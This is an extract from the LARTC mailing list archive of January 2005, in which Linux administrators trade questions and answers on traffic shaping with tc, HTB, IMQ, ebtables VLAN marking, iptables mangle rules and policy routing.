Content-Transfer-Encoding: 8BIT > iptables -t mangle -A OUTPUT -d 10.190.6.16 -j MARK --set-mark 20 > iptables -t mangle -A OUTPUT -d 10.190.6.16 -j RETURN > > tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11 > > I expect data from ssh server to my client 10.190.6.16 should goes into > 1:11, and other data goes into default 1:13. But when I use ssh client > on other machine(not 10.190.6.16), the data seems also goes into 1:11(I > got this from tc -s -d class show dev eth0). Why? Because you didn't flush the mangle table. Your example works ok for me. Add a iptables -t mangle -F before running the script. > > "Catalin(ux aka Dino) BOIE" wrote: > On Thu, 27 Jan 2005, CcM wrote: > >> Now I want to control ports with ips specified, like following, it seems not work, only --sport effect. Ftp-data goes to ips beside 10.190.6.16 also goes into 1:12 while default is 1:13. Why? >> >> tc qdisc add dev eth0 root handle 1: htb default 13 >> tc class add dev eth0 parent 1: classid 1:1 htb rate 80000kbit ceil 80000kbit prio 1 >> tc class add dev eth0 parent 1:1 classid 1:11 htb rate 40kbit ceil 40kbit prio 1 >> tc class add dev eth0 parent 1:1 classid 1:12 htb rate 800kbit ceil 1600kbit prio 1 >> tc class add dev eth0 parent 1:1 classid 1:13 htb rate 70000kbit ceil 80000kbit prio 1 >> tc qdisc add dev eth0 parent 1:11 handle 111: sfq perturb 5 >> tc qdisc add dev eth0 parent 1:12 handle 112: sfq perturb 5 >> tc qdisc add dev eth0 parent 1:13 handle 113: sfq perturb 5 >> >> iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j MARK --set-mark 20 >> iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j RETURN >> >> iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j MARK --set-mark 21 >> iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j RETURN > > I bet you use passive mode in ftp so you get a weird port, not ftp-data > (20). ftp is tricky to match. You can use this: > iptables -t mangle -A POSTROUTING -d x.x.x.x -m helper --helper ftp \ > -j MARK --set-mark 21 > This will mark with 21 all ftp control+data connections. > >> >> tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11 >> tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 21 fw flowid 1:12 >> >> >> "Catalin(ux aka Dino) BOIE" wrote: >> On Wed, 26 Jan 2005, CcM wrote: >> >>> It does work! Thanks! >>> But many articles write like what I did, what's the difference between POSTROUTING and PREROUTING. I mean I know these are two hook point in ip stack, but why should be POSTROUTING here when do mangle? >>> >>> "Catalin(ux aka Dino) BOIE" wrote: >>> Use: >>> iptables -t mangle -A POSTROUTING -p tcp -m tcp --sport 22 -j MARK \ >>> --set-mark 20 >> >> Because local generated packets doesn't go through PREROUTING. >> But, best is to use OUTPUT. >> >>> >>> --- >>> Catalin(ux aka Dino) BOIE >>> catab at deuroconsult.ro >>> http://kernel.umbrella.ro/ >>> _______________________________________________ >>> LARTC mailing list / LARTC@mailman.ds9a.nl >>> http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ >>> >>> >>> >>> --------------------------------- >>> Do You Yahoo!? >>> ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ >> >> --- >> Catalin(ux aka Dino) BOIE >> catab at deuroconsult.ro >> http://kernel.umbrella.ro/ >> >> >> --------------------------------- >> Do You Yahoo!? >> ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ > > --- > Catalin(ux aka Dino) BOIE > catab at deuroconsult.ro > http://kernel.umbrella.ro/ > > > --------------------------------- > Do You Yahoo!? > ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ ---1646943047-1848846197-1106900163=:3893-- From raptor@tvskat.net Fri Jan 28 10:19:36 2005 From: raptor@tvskat.net (raptor@tvskat.net) Date: Fri, 28 Jan 2005 12:19:36 +0200 Subject: [LARTC] iproute-save ? In-Reply-To: <41F9F545.6040409@cardvn.net> References: <20050128091239.102bec97@bugs> <41F9F545.6040409@cardvn.net> Message-ID: <20050128121936.394616d9@bugs> that is the hard part to make it not mess with normal if-up/down scripts and routes they add... I have alot of manual routes and rules which are not easy handled especialy when I add another boxes which also happen to have different routes..... If I can figure out the format of the default-ip-up/down routes I can skip them with a regex.. will have to look.. |I think it doesn't sound elegant, routing system strictly depends on |availability interfaces, so setting up routes should be done in if-up |and if-down script, for example, if you unplug a NIC before booting the |computer, do you want the route for that NIC to be set up? And sometimes |you may need to bring down a NIC - then the kernel will delete your |routes automatically, if you have a nice if-up script, the routes will |be recovered when you bring it up. An init.d script can't do it. |If you still want a init.d script, go ahead and write your own script, |it's rather easy to do save states and restore on boot, but I guess you |may want things to done right instead of a messy solution. | |raptor@tvskat.net wrote: | |>Anyone to know iproute-save, iproute-restore like script similar iptables-save/restore ? |>that stores everytihng routes,rules,tables everything ... |>then init.d-script that among other things stores the state on shutdown :") (thats easy then) |> |> | ----- http://linuxtoday.com/news_story.php3?ltsn=2004-12-08-004-32-OS-BZ-DT-0005 snip> MS Office is popular in the same way as heart disease is the most popular way to die. From paras@bajranet.com.np Fri Jan 28 11:48:57 2005 From: paras@bajranet.com.np (Paras pradhan) Date: Fri, 28 Jan 2005 17:33:57 +0545 (NPT) Subject: [LARTC] Linux Bridge + QoS Shaper HOWTO available In-Reply-To: References: Message-ID: <57084.202.174.152.73.1106912937.squirrel@mail.imax.com.np> hello: nice article... Does any one has same kind of article covering IMQ? Thanks Paras. > I've created a pretty complete HOWTO on creating a Linux Bridge (using > Fedora) to shape LAN <--> WAN traffic. It includes installation > instructions, a script to configure the bridge (which you install as a > service), and 2 scripts to configure the network interfaces using > traffic control. > > http://www.burnpc.com/website.nsf/all/3a64a6369757819686256f960068ad75!OpenDocument > > > > If anyone has any questions or feedback I'm very interested. This > configuration has evolved over the past 6 months and is somewhat > tweaked. The highest priority traffic in my config, is of course, IAX2 > (Asterisk VoIP protocol). > > Regards, > > Ron Paras pradhan Systems Dept. Bajranet PVT LTD Kathmandu Nepal. From david.hajek@systinet.com Fri Jan 28 13:26:22 2005 From: david.hajek@systinet.com (David Hajek) Date: Fri, 28 Jan 2005 14:26:22 +0100 Subject: [LARTC] IMQ with IPSec Message-ID: <20050128132631.97DDF4007@outpost.ds9a.nl> Hi, I would like to shape incomming traffic on eth0 and ipsec0 (binded to eth0). I need to set minimal bandwidth to some packets going via ipsec0 interface. It is running fine when I simply mark the ESP (protocol 50) packets in the PREROUTING chain - means all ipsec packets are shaped. Like: iptables -t mangle -A PREROUTING -i eth0 -p 50 -j MARK --set-mark 30 iptables -t mangle -A PREROUTING -i eth0 -p 50 -j RETURN The issue I'm dealing with is how can I mark packets based on internal destinantion/source IP in PREROUTING chain when it is encrypted ipsec packet. I can see the ipsec packet decrypted in FORWARD chain, but will that work correctly with IMQ, when I mark it here? Thanks, David From alaios@yahoo.com Fri Jan 28 16:44:19 2005 From: alaios@yahoo.com (Alaios) Date: Fri, 28 Jan 2005 08:44:19 -0800 (PST) Subject: [LARTC] tc filter change/replace Message-ID: <20050128164419.40811.qmail@web54710.mail.yahoo.com> Tomas Graf: You mentioned that "All classifier except rsvp are changeable in the latest bk. The patchset has gone in around rc1-bk3-5" Well issue 1 is that in iproute-latest (as well as the one released yesterday) the output of: tc show filter dev eth0 parent ffff:" and change/replace DO NOT WORK. ----------------------------------------------------------------------- filter protocol ip pref 50 u32 fh 800::801 order 2049 ht 800 bkt 0 match 0a010102/ffffffff at 12 police 0x4 rate 20000bit burst 2559b mtu 2kb action reclassify ref -10352222812 bind -8666697856 on the bk version (latest changeLog entry 18-1-2005) as you suggested the output is NOT VERBOSE ENOUGH to see if all parameters are working, but change/replace SEEM TO BE WORKING. Heres the output: filter protocol ip pref 50 u32 fh 800::801 order 2049 ht 800 bkt 0 match 0a010102/ffffffff at 12 ISSUE 2 ------- In lots of computers i try to install iproute2 i get an error about db_185.h missing . Issuing a simple apt-get install libdb4.1-dev resolves the problem and the arpd compiles perfectly. Maybe consider documenting that somewhere. __________________________________ Do you Yahoo!? Meet the all-new My Yahoo! - Try it today! http://my.yahoo.com From andy.furniss@dsl.pipex.com Sat Jan 29 00:55:39 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Sat, 29 Jan 2005 00:55:39 +0000 Subject: [LARTC] Re: Confuse, putting packets in wrong mangle table. In-Reply-To: <200501281347.35551.rio@martin.mu> References: <200501191657.15767.rio@martin.mu> <200501261804.53584.rio@martin.mu> <41F8E0A1.4060108@dsl.pipex.com> <200501281347.35551.rio@martin.mu> Message-ID: <41FADF0B.4030508@dsl.pipex.com> Rio Martin. wrote: > On Thursday 27 January 2005 12:37, Andy Furniss wrote: > >>>I'll make it simple for you as possible. >>>i have linux box which have eth0 220.1.1.1 as primary ip and aliasses: >>>eth0:1 192.168.1.1 , eth0:1 192.168.1.2 >>>Both 192.168.1.1 & 192.168.1.2 NATed to 220.1.1.1 >>>OKay, now my question is: >>>How do i manage and limit traffic generated from those ips (192.168.1.1 & >>>192.168.1.2) ? Not just traffic outside, but traffic coming to those ips >>>from Internet. >>>I found it so difficult because traffic coming from internet to eth0 will >>>be using 220.1.1.1 not 192.168.x.x >> >>If you use IMQ and get it to hook after NAT in PREROUTING then forwarded >>traffic should have been denatted and have local addresses. You can use >>TC filters to classify for htb etc. >>Traffic from internet to squid will probably have 220. IP address. > > > Thats what i'm worrying of, the ip address from internet would be 220.1.1.1, > not 192.168.x.x > IMQ with iptables marking unable to mark the packets to 192.168.x.x Iptables can't mark traffic from inet to lan, but imq hooked after nat in prerouting will see local addresses for inet to lan traffic and 220.1.1.1 for traffic from inet to squid. You use tc filters and u32 to match them eg. $TC filter add dev $DWIF protocol ip parent 1:2 prio 1 u32 \ match ip dst 192.168.0.2 flowid 1:32 > > >>If you want to try a way without IMQ then AIUI you can patch squid so >>you can classify hit/miss traffic and then you could shape traffic as >>egress on eth0. I don't use squid - but I assume here it limits the rate >>it pulls miss pages to the rate that client requests. >>http://www.docum.org/docum.org/faq/cache/65.html > > > I ve tried this before, but never succeed. I didnt know where should i attach > the 10:100 class. In the document, just told to add this class in tc, without > giving some information which interface should i attach this class. I've not used squid, but think the idea is to shape on eth0 traffic from inet to lan and miss traffic from squid to lan. The patch lets you classify miss traffic from squid which you make an htb class for and you can then involve it in sharing/priorotising etc with other inet to lan traffic. Andy. > > Regards, > Rio Martin. > From rio@martin.mu Sat Jan 29 18:29:44 2005 From: rio@martin.mu (Rio Martin.) Date: Sat, 29 Jan 2005 18:29:44 +0000 Subject: [LARTC] Re: Confuse, putting packets in wrong mangle table. In-Reply-To: <41FADF0B.4030508@dsl.pipex.com> References: <200501191657.15767.rio@martin.mu> <200501281347.35551.rio@martin.mu> <41FADF0B.4030508@dsl.pipex.com> Message-ID: <200501291829.44294.rio@martin.mu> On Saturday 29 January 2005 00:55, Andy Furniss wrote: > > I ve tried this before, but never succeed. I didnt know where should i > > attach the 10:100 class. In the document, just told to add this class in > > tc, without giving some information which interface should i attach this > > class. > I've not used squid, but think the idea is to shape on eth0 traffic from > inet to lan and miss traffic from squid to lan. The patch lets you > classify miss traffic from squid which you make an htb class for and you > can then involve it in sharing/priorotising etc with other inet to lan > traffic. > Andy. Thanks Andy for the info u gave, But the patch is totally missed with Squid-2.5.STABLE7, so i have to do it manually. I tried to placed this 10:100 class into eth0 (inet interface) and successfully do some shaping on outgoing request from squid to origin server where client request. It wont shape the incoming from origin server to squid. As u see, this is tcp_outgoing_priority, not tcp_incoming_priority.. :)) so i still have to figure out more how to shape incoming packets to this squid proxy. - Rio.Martin - From beatlelittle@yahoo.com.cn Sun Jan 30 07:26:22 2005 From: beatlelittle@yahoo.com.cn (CcM) Date: Sun, 30 Jan 2005 15:26:22 +0800 (CST) Subject: [LARTC] Ssh flow does not go into correct class. Help! In-Reply-To: Message-ID: <20050130072623.67498.qmail@web15506.mail.cnb.yahoo.com> --0-168428698-1107069982=:63766 Content-Type: text/plain; charset=gb2312 Content-Transfer-Encoding: 8bit You're right. Thank you very much! "Catalin(ux aka Dino) BOIE" wrote:> iptables -t mangle -A OUTPUT -d 10.190.6.16 -j MARK --set-mark 20 > iptables -t mangle -A OUTPUT -d 10.190.6.16 -j RETURN > > tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11 > > I expect data from ssh server to my client 10.190.6.16 should goes into > 1:11, and other data goes into default 1:13. But when I use ssh client > on other machine(not 10.190.6.16), the data seems also goes into 1:11(I > got this from tc -s -d class show dev eth0). Why? Because you didn't flush the mangle table. Your example works ok for me. Add a iptables -t mangle -F before running the script. > > "Catalin(ux aka Dino) BOIE" wrote: > On Thu, 27 Jan 2005, CcM wrote: > >> Now I want to control ports with ips specified, like following, it seems not work, only --sport effect. Ftp-data goes to ips beside 10.190.6.16 also goes into 1:12 while default is 1:13. Why? >> >> tc qdisc add dev eth0 root handle 1: htb default 13 >> tc class add dev eth0 parent 1: classid 1:1 htb rate 80000kbit ceil 80000kbit prio 1 >> tc class add dev eth0 parent 1:1 classid 1:11 htb rate 40kbit ceil 40kbit prio 1 >> tc class add dev eth0 parent 1:1 classid 1:12 htb rate 800kbit ceil 1600kbit prio 1 >> tc class add dev eth0 parent 1:1 classid 1:13 htb rate 70000kbit ceil 80000kbit prio 1 >> tc qdisc add dev eth0 parent 1:11 handle 111: sfq perturb 5 >> tc qdisc add dev eth0 parent 1:12 handle 112: sfq perturb 5 >> tc qdisc add dev eth0 parent 1:13 handle 113: sfq perturb 5 >> >> iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j MARK --set-mark 20 >> iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j RETURN >> >> iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j MARK --set-mark 21 >> iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j RETURN > > I bet you use passive mode in ftp so you get a weird port, not ftp-data > (20). ftp is tricky to match. You can use this: > iptables -t mangle -A POSTROUTING -d x.x.x.x -m helper --helper ftp \ > -j MARK --set-mark 21 > This will mark with 21 all ftp control+data connections. > >> >> tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11 >> tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 21 fw flowid 1:12 >> >> >> "Catalin(ux aka Dino) BOIE" wrote: >> On Wed, 26 Jan 2005, CcM wrote: >> >>> It does work! Thanks! >>> But many articles write like what I did, what's the difference between POSTROUTING and PREROUTING. I mean I know these are two hook point in ip stack, but why should be POSTROUTING here when do mangle? >>> >>> "Catalin(ux aka Dino) BOIE" wrote: >>> Use: >>> iptables -t mangle -A POSTROUTING -p tcp -m tcp --sport 22 -j MARK \ >>> --set-mark 20 >> >> Because local generated packets doesn't go through PREROUTING. >> But, best is to use OUTPUT. >> >>> >>> --- >>> Catalin(ux aka Dino) BOIE >>> catab at deuroconsult.ro >>> http://kernel.umbrella.ro/ >>> _______________________________________________ >>> LARTC mailing list / LARTC@mailman.ds9a.nl >>> http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ >>> >>> >>> >>> --------------------------------- >>> Do You Yahoo!? >>> ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ >> >> --- >> Catalin(ux aka Dino) BOIE >> catab at deuroconsult.ro >> http://kernel.umbrella.ro/ >> >> >> --------------------------------- >> Do You Yahoo!? >> ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ > > --- > Catalin(ux aka Dino) BOIE > catab at deuroconsult.ro > http://kernel.umbrella.ro/ > > > --------------------------------- > Do You Yahoo!? > ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ --------------------------------- Do You Yahoo!? ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --0-168428698-1107069982=:63766 Content-Type: text/html; charset=gb2312 Content-Transfer-Encoding: 8bit
You're right. Thank you very much!

"Catalin(ux aka Dino) BOIE" <util@deuroconsult.ro> wrote:
> iptables -t mangle -A OUTPUT -d 10.190.6.16 -j MARK --set-mark 20
> iptables -t mangle -A OUTPUT -d 10.190.6.16 -j RETURN
>
> tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11
>
> I expect data from ssh server to my client 10.190.6.16 should goes into
> 1:11, and other data goes into default 1:13. But when I use ssh client
> on other machine(not 10.190.6.16), the data seems also goes into 1:11(I
> got this from tc -s -d class show dev eth0). Why?

Because you didn't flush the mangle table. Your example works ok for me.
Add a iptables -t mangle -F before running the script.

>
> "Catalin(ux aka Dino) BOIE" wrote:
> On Thu, 27 Jan 2005, CcM wrote:
>
>> Now I want to control ports with ips specified, like following, it seems not work, only --sport effect. Ftp-data goes to ips beside 10.190.6.16 also goes into 1:12 while default is 1:13. Why?
>>
>> tc qdisc add dev eth0 root handle 1: htb default 13
>> tc class add dev eth0 parent 1: classid 1:1 htb rate 80000kbit ceil 80000kbit prio 1
>> tc class add dev eth0 parent 1:1 classid 1:11 htb rate 40kbit ceil 40kbit prio 1
>> tc class add dev eth0 parent 1:1 classid 1:12 htb rate 800kbit ceil 1600kbit prio 1
>> tc class add dev eth0 parent 1:1 classid 1:13 htb rate 70000kbit ceil 80000kbit prio 1
>> tc qdisc add dev eth0 parent 1:11 handle 111: sfq perturb 5
>> tc qdisc add dev eth0 parent 1:12 handle 112: sfq perturb 5
>> tc qdisc add dev eth0 parent 1:13 handle 113: sfq perturb 5
>>
>> iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j MARK --set-mark 20
>> iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j RETURN
>>
>> iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j MARK --set-mark 21
>> iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j RETURN
>
> I bet you use passive mode in ftp so you get a weird port, not ftp-data
> (20). ftp is tricky to match. You can use this:
> iptables -t mangle -A POSTROUTING -d x.x.x.x -m helper --helper ftp \
> -j MARK --set-mark 21
> This will mark with 21 all ftp control+data connections.
>
>>
>> tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11
>> tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 21 fw flowid 1:12
>>
>>
>> "Catalin(ux aka Dino) BOIE" wrote:
>> On Wed, 26 Jan 2005, CcM wrote:
>>
>>> It does work! Thanks!
>>> But many articles write like what I did, what's the difference between POSTROUTING and PREROUTING. I mean I know these are two hook point in ip stack, but why should be POSTROUTING here when do mangle?
>>>
>>> "Catalin(ux aka Dino) BOIE" wrote:
>>> Use:
>>> iptables -t mangle -A POSTROUTING -p tcp -m tcp --sport 22 -j MARK \
>>> --set-mark 20
>>
>> Because local generated packets doesn't go through PREROUTING.
>> But, best is to use OUTPUT.
>>
>>>
>>> ---
>>> Catalin(ux aka Dino) BOIE
>>> catab at deuroconsult.ro
>>> http://kernel.umbrella.ro/
>>> _______________________________________________
>>> LARTC mailing list / LARTC@mailman.ds9a.nl
>>> http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
>>>
>>>
>>>
>>> ---------------------------------
>>> Do You Yahoo!?
>>> ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ
>>
>> ---
>> Catalin(ux aka Dino) BOIE
>> catab at deuroconsult.ro
>> http://kernel.umbrella.ro/
>>
>>
>> ---------------------------------
>> Do You Yahoo!?
>> ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ
>
> ---
> Catalin(ux aka Dino) BOIE
> catab at deuroconsult.ro
> http://kernel.umbrella.ro/
>
>
> ---------------------------------
> Do You Yahoo!?
> ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ

---
Catalin(ux aka Dino) BOIE
catab at deuroconsult.ro
http://kernel.umbrella.ro/


Do You Yahoo!?
×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --0-168428698-1107069982=:63766-- From kamen@cybuild.com Sun Jan 30 09:15:46 2005 From: kamen@cybuild.com (Kamen TOMOV) Date: 30 Jan 2005 11:15:46 +0200 Subject: [LARTC] problem - multiple links to a network Message-ID: <87zmyrz399.fsf@c3po.zlatenlist.net> Hi, I have a Linux machine with kernel 2.6 and 3 network cards. I would like to ask what rules should I have in the routing table so that: 192.168.254.0/25 is routed through eth1 192.168.254.128/25 is routed through eth2 eth0 is my internal interface and eth1/eth2 are the external interfaces. * What is particulary specific for this case is that ipaddr_eth1 is in the same network as ipaddr_eth2 and that ipaddr_gateway_eth1 is the same as ipaddr_gateway_eth2. Here is what I have done so far: r2 root # ip rule ls 0: from all lookup local 32764: from 192.168.254.0/25 lookup 230 32765: from 192.168.254.128/25 lookup 231 32766: from all lookup main 32767: from all lookup default r2 root # ip route ls A.B.C.0/24 dev eth2 proto kernel scope link src A.B.C.X A.B.C.0/24 dev eth1 proto kernel scope link src A.B.C.Y 192.168.254.0/24 dev eth0 proto kernel scope link src 192.168.254.1 default via A.B.C.D dev eth1 r2 root # ip route ls table 230 A.B.C.0/24 dev eth1 scope link src A.B.C.X A.B.C.0/24 dev eth0 scope link src 192.168.254.1 default via A.B.C.D dev eth1 r2 root # ip route ls table 231 A.B.C.0/24 dev eth2 scope link src A.B.C.Y A.B.C.0/24 dev eth0 scope link src 192.168.254.1 default via A.B.C.D dev eth2 As a result the network segment 192.168.254.128/25 does not have access to Internet. Any ideas why? Is it a problem that eth1 is in the same network as eth2? Thanks in advance, -- Kamen TOMOV From jzhang@cienettechnologies.com Mon Jan 31 06:12:59 2005 From: jzhang@cienettechnologies.com (kingz) Date: Sun, 30 Jan 2005 22:12:59 -0800 Subject: [LARTC] tc, VLAN, ebtables issue Message-ID: <000201c5075b$ed8dd1c0$1201a8c0@kingz> Hi all, I am testing one QOS system, I want to control bandwidth by VLAN id. Here is my test network: Internet Gateway | | QOS control box ( Bridge box, Redhat 9, 2.4.28 kernel with ebtables-brnf-8_vs_2.4.28 patch) | | VLAN Switch | | PC PC In my QOS control box, it is a bridge box, I used Redhat 9, 2.4.28 kernel with ebtables-brnf-8_vs_2.4.28 patch, and used HTB to control BW. Both sides NICs of the QOS box are e1000 , and in normal state, not VLAN tagged. I created a tagged VLAN for our PCs under the VLAN switch, our PCs can go through the QOS box and Gateway to reach Internet. On the QOS box, I setup the following rules: # create class ( use HTB class) /usr/sbin/tc qdisc del dev eth0 root 2> /dev/null > /dev/null /usr/sbin/tc qdisc del dev eth1 root 2> /dev/null > /dev/null /usr/sbin/tc qdisc add dev eth0 root handle 1: htb default 9 /usr/sbin/tc class add dev eth0 parent 1: classid 1:1 htb rate 256kbps ceil 256kbps /usr/sbin/tc class add dev eth0 parent 1:1 classid 1:9 htb rate 1kbps ceil 256kbps prio 7 ## eth0 port class /usr/sbin/tc class add dev eth0 parent 1:1 classid 1:10 htb rate 1kbps ceil 256kbps prio 0 /usr/sbin/tc qdisc add dev eth0 parent 1:10 handle 10: sfq /usr/sbin/tc class add dev eth0 parent 1:1 classid 1:11 htb rate 1kbps ceil 3kbps prio 2 /usr/sbin/tc qdisc add dev eth0 parent 1:11 handle 11: sfq /usr/sbin/tc qdisc add dev eth1 root handle 1: htb default 9 /usr/sbin/tc class add dev eth1 parent 1: classid 1:1 htb rate 256kbps ceil 256kbps /usr/sbin/tc class add dev eth1 parent 1:1 classid 1:9 htb rate 1kbps ceil 256kbps prio 7 ## eth1 port class /usr/sbin/tc class add dev eth1 parent 1:1 classid 1:10 htb rate 1kbps ceil 256kbps prio 0 /usr/sbin/tc qdisc add dev eth1 parent 1:10 handle 10: sfq /usr/sbin/tc class add dev eth1 parent 1:1 classid 1:11 htb rate 1kbps ceil 2kbps prio 2 /usr/sbin/tc qdisc add dev eth1 parent 1:11 handle 11: sfq Then mark VLAN traffic: ebtables -A FORWARD -p 802_1Q --vlan-id 103 -j mark --set-mark 2 --mark-target CONTINUE Then classify VLAN traffic to the specify class /usr/sbin/tc filter add dev eth0 parent 1: protocol ip prio 2 handle 2 fw classid 1:11 But the result is: the VLAN id 103 traffic go to the default class 1:9, not go to the class 1:11 as we expected. >From the stat of ebtables, I can see there are bytes count in the VLAN id 103 mark chain, ebtables marked the VLAN id 103 traffic; but from the stat of class, I can see that no traffic go to the class 1:11 we expect. It as if Tc can not classify these marked tfaffic. My idea is that controlling by VLAN id. Any good idea, comments on my issue? Are my above rules right? Thank in advance! BR Kingz From rsenykoff@harrislogic.com Sun Jan 30 15:00:20 2005 From: rsenykoff@harrislogic.com (rsenykoff@harrislogic.com) Date: Sun, 30 Jan 2005 09:00:20 -0600 Subject: [LARTC] PRIO inside HTB - trouble attaching filters correctly? Message-ID: This is a multipart message in MIME format. --=_alternative 00526DAD86256F99_= Content-Type: text/plain; charset="US-ASCII" Hello everyone! I'm simply trying to put a PRIO inside an HTB (used to throttle). I've got interactive traffic on the network that I want to give priority (VoIP + Citrix + Video). I've used the filters in a CBQ script fine, but am having trouble adjusting them to this setup such that they properly assign the traffic. tc qdisc del root dev $e tc qdisc add dev $e root handle 1: htb default 3 tc class add dev $e parent 1: classid 1:1 htb rate $wanRate # now that we've throttled the interface, we create the PRIO queue tc qdisc add dev $e parent 1:1 handle 10: prio # instantly creates classes 10:1, 10:2, 10:2 tc qdisc add dev $e parent 10:1 handle 1: pfifo tc qdisc add dev $e parent 10:2 handle 2: pfifo tc qdisc add dev $e parent 10:3 handle 3: sfq ############### VoIP ################ # IAX # this is the old format - IAX2 should be what's really seen going on tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip sport 5036 0xffff flowid 10:1 tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip dport 5036 0xffff flowid 10:1 # IAX2 # tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip sport 4569 0xffff flowid 10:1 tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip dport 4569 0xffff flowid 10:1 # match icmp echo request tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip icmp_type 0x08 0xff flowid 10:1 # match icmp echo reply tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip icmp_type 0x00 0xff flowid 10:1 ## etc........... TIA! -Ron --=_alternative 00526DAD86256F99_= Content-Type: text/html; charset="US-ASCII"
Hello everyone!

I'm simply trying to put a PRIO inside an HTB (used to throttle). I've got interactive traffic on the network that I want to give priority (VoIP + Citrix + Video).

I've used the filters in a CBQ script fine, but am having trouble adjusting them to this setup such that they properly assign the traffic.

tc qdisc del root dev $e

tc qdisc add dev $e root handle 1: htb default 3

tc class add dev $e parent 1: classid 1:1 htb rate $wanRate

# now that we've throttled the interface, we create the PRIO queue
tc qdisc add dev $e parent 1:1 handle 10: prio
# instantly creates classes 10:1, 10:2, 10:2

tc qdisc add dev $e parent 10:1 handle 1: pfifo
tc qdisc add dev $e parent 10:2 handle 2: pfifo
tc qdisc add dev $e parent 10:3 handle 3: sfq

############### VoIP ################

# IAX # this is the old format - IAX2 should be what's really seen going on
tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip sport 5036 0xffff flowid 10:1
tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip dport 5036 0xffff flowid 10:1

# IAX2 #
tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip sport 4569 0xffff flowid 10:1
tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip dport 4569 0xffff flowid 10:1

# match icmp echo request
tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip icmp_type 0x08 0xff flowid 10:1

# match icmp echo reply
tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip icmp_type 0x00 0xff flowid 10:1

## etc...........

TIA!
-Ron
--=_alternative 00526DAD86256F99_=-- From nug@sch.bme.hu Sun Jan 30 17:01:56 2005 From: nug@sch.bme.hu (=?ISO-8859-1?Q?T=F3th_N=E1ndor?=) Date: Sun, 30 Jan 2005 18:01:56 +0100 Subject: [LARTC] simple questions about imq Message-ID: <41FD1304.1080305@sch.bme.hu> Hi! I have read all informations i could find, but some things are still not clear. My setup is: ---INTERNET1(eth0)-\ /- Local net1 (eth2) GW ---INTERNET2(eth1)-/ \- Local net2 (eth3) I have NAT and a working setup using HTB,SFQ, classifying with the iptables -j CLASSIFY way. I shape only the traffic coming from the internet heading to the intranet. I would like to have a configuration like this: ---INTERNET1(eth0)-\ /- Local net1 (eth2) GW--imq0 ---INTERNET2(eth1)-/ \- Local net2 (eth3) I think it can be done this way: iptables -t mangle -A PREROUTING -i eth0 -j IMQ --todev 0 iptables -t mangle -A PREROUTING -i eth1 -j IMQ --todev 0 But it would include traffic heading to the gateway directly, wouldn't it? Can i put these rules to the POSTROUTING chain? And i can still have my CLASSIFY targets in the POSTROUTING chain, because IMQ queing will happen after it according to http://lartc.org/howto/lartc.imq.html. So for example: $IPTABLES -t mangle -A POSTROUTING -o $eth2 ... -j CLASSIFY --set-class 1:30 $IPTABLES -t mangle -A POSTROUTING -o $eth3 ... -j CLASSIFY --set-class 1:30 $IPTABLES -t mangle -A POSTROUTING -o $eth2 ... -j RETURN $IPTABLES -t mangle -A 